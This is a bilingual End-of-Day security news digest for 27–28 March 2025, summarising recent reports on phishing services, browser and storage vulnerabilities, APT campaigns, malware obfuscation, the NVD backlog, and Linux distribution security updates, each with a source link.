===================== = End-of-Day report = =====================
Timeframe: Donnerstag 27-03-2025 18:00 − Freitag 28-03-2025 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer
===================== = News = =====================
∗∗∗ Phishing-as-a-service operation uses DNS-over-HTTPS for evasion ∗∗∗ --------------------------------------------- A newly discovered phishing-as-a-service (PhaaS) operation that researchers call Morphing Meerkat, has been using the DNS over HTTPS (DoH) protocol to evade detection. -------------------------------------------- https://www.bleepingcomputer.com/news/security/phishing-as-a-service-operati...
∗∗∗ Notfallupdate: Kritische Sandbox-Lücke in Firefox und Tor-Browser entdeckt ∗∗∗ --------------------------------------------- Nicht nur Chrome-Nutzer sollten dieser Tage ihren Browser updaten. Eine aktiv ausgenutzte Sicherheitslücke betrifft auch die Windows-Version von Firefox. --------------------------------------------- https://www.golem.de/news/notfallupdate-kritische-sandbox-luecke-in-firefox-...
∗∗∗ Stealing user credentials with evilginx ∗∗∗ --------------------------------------------- A malevolent mutation of the widely used nginx web server facilitates Adversary-in-the-Middle action, but there's hope. --------------------------------------------- https://news.sophos.com/en-us/2025/03/28/stealing-user-credentials-with-evil...
∗∗∗ Quick Guide to Magento Security Patches ∗∗∗ --------------------------------------------- Magento remains a popular ecommerce platform in 2025 and its security patches play a vital role in addressing vulnerabilities that could otherwise be exploited by attackers. These patches help prevent issues like data breaches, website defacement, or unauthorized access, ensuring the safety of customer data and store operations. Given the platform’s .. --------------------------------------------- https://blog.sucuri.net/2025/03/quick-guide-to-magento-security-patches.html
∗∗∗ China’s FamousSparrow flies back into action, breaches US org after years off the radar ∗∗∗ --------------------------------------------- Crew also cooked up two fresh SparrowDoor backdoor variants, says ESET The China-aligned FamousSparrow crew has resurfaced after a long period of presumed inactivity, compromising a US financial-sector trade group and a Mexican research institute. The gang also likely targeted a governmental institution in Honduras, along with other yet-to-be-identified victims. --------------------------------------------- https://www.theregister.com/2025/03/27/china_famoussparrow_back/
∗∗∗ Storage-Appliances: Dell schließt unzählige Sicherheitslücken in Unity-Serien ∗∗∗ --------------------------------------------- Die Dell-Entwickler haben unter anderem eine 19 Jahre alte Schwachstelle in diversen Unity-Modellen geschlossen. --------------------------------------------- https://www.heise.de/news/Storage-Appliances-Dell-schliesst-unzaehlige-Siche...
∗∗∗ New security requirements adopted by HTTPS certificate industry ∗∗∗ --------------------------------------------- The Chrome Root Program launched in 2022 as part of Google’s ongoing commitment to upholding secure and reliable network connections in Chrome. We previously described how the Chrome Root Program keeps users safe, and described how the program is focused on promoting technologies and practices that strengthen the underlying .. --------------------------------------------- http://security.googleblog.com/2025/03/new-security-requirements-adopted-by....
∗∗∗ Money Laundering 101, and why Joe is worried ∗∗∗ --------------------------------------------- In this blog post, Joe covers the very basics of money laundering, how it facilitates ransomware cartels, and what the regulatory future holds for cybercrime. --------------------------------------------- https://blog.talosintelligence.com/money-laundering-101-and-why-joe-is-worri...
∗∗∗ Gamaredon campaign abuses LNK files to distribute Remcos backdoor ∗∗∗ --------------------------------------------- Cisco Talos is actively tracking an ongoing campaign, targeting users in Ukraine with malicious LNK files which run a PowerShell downloader since at least November 2024. --------------------------------------------- https://blog.talosintelligence.com/gamaredon-campaign-distribute-remcos/
∗∗∗ Obfuscation 101: Unmasking the Tricks Behind Malicious Code ∗∗∗ --------------------------------------------- “The malicious package was right in front of our eyes, but we didnt see it until it was too late.”Attackers frequently rely on obfuscation—the technique of deliberately making source code confusing and unreadable—to sneak malicious payloads past security defenses and code reviewers alike. Understanding these obfuscation techniques across .. --------------------------------------------- https://socket.dev/blog/obfuscation-101-the-tricks-behind-malicious-code
∗∗∗ NVD Concedes Inability to Keep Pace with Surging CVE Disclosures in 2025 ∗∗∗ --------------------------------------------- The National Vulnerability Database (NVD) issued a new status update on March 19, attempting to clarify the current state of its vulnerability processing pipeline. The agency says it has resumed processing new CVEs at the same rate it maintained before last year’s slowdown, but with vulnerability volumes surging, that’s no longer enough.We are currently .. --------------------------------------------- https://socket.dev/blog/nvd-backlog-crisis-deepens-amid-surging-cve-disclosu...
===================== = Vulnerabilities = =====================
∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (mercurial and opensaml), Fedora (augeas, mingw-libxslt, and nodejs-nodemon), Mageia (chromium-browser-stable), Red Hat (grafana, kernel, kernel-rt, opentelemetry-collector, and podman), SUSE (apache-commons-vfs2, python3, and python36), and Ubuntu (ghostscript, linux, linux-aws, linux-azure, linux-gcp, linux-gke, linux-gkeop, linux-ibm, linux-intel-iotg, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle, linux-oracle-5.15, .. --------------------------------------------- https://lwn.net/Articles/1015718/